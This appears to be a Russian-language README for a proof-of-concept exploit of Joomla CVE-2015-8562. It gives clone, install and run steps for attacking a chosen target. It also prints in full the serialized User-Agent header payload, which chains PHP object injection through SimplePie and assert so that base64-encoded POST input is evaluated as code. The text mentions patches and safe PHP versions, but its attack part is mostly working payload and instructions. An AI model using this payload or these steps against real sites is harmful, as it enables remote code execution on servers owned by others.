
Доказательство концепции для уязвимости Joomla CVE-2015-8562
Доказательство концепции уязвимости CVE-2015-8562 в Joomla
Этот PoC — почти точная копия реализации на Python от Gary, размещённой на exploit-db.
Установка очень проста:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
После того как composer установит всё необходимое, вам нужно изменить $target в exploit.php.
После этого вы готовы к запуску:
php exploit.php
В декабре 2015 года в Joomla была обнаружена уязвимость. Она позволяет удалённым злоумышленникам проводить атаки внедрения объектов PHP и выполнять произвольный PHP-код через заголовок HTTP User-Agent.
Эта уязвимость затрагивает все версии Joomla. Патч для v1.5.x, v2.5x и v3.x уже выпущен.
Если вы используете PHP >= 5.4.45, >= 5.5.29 или >= 5.6.13, вы в безопасности, поскольку эта эксплойт также использует CVE-2015-6835.
Никос Верскор из PatrolServer написал очень подробный пост в блоге и оказал большую помощь в понимании этой уязвимости. Вы можете бесплатно использовать их мини-сканер, чтобы проверить, находится ли ваш сайт под угрозой.
Вот как выглядит отправленный заголовок User-Agent:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}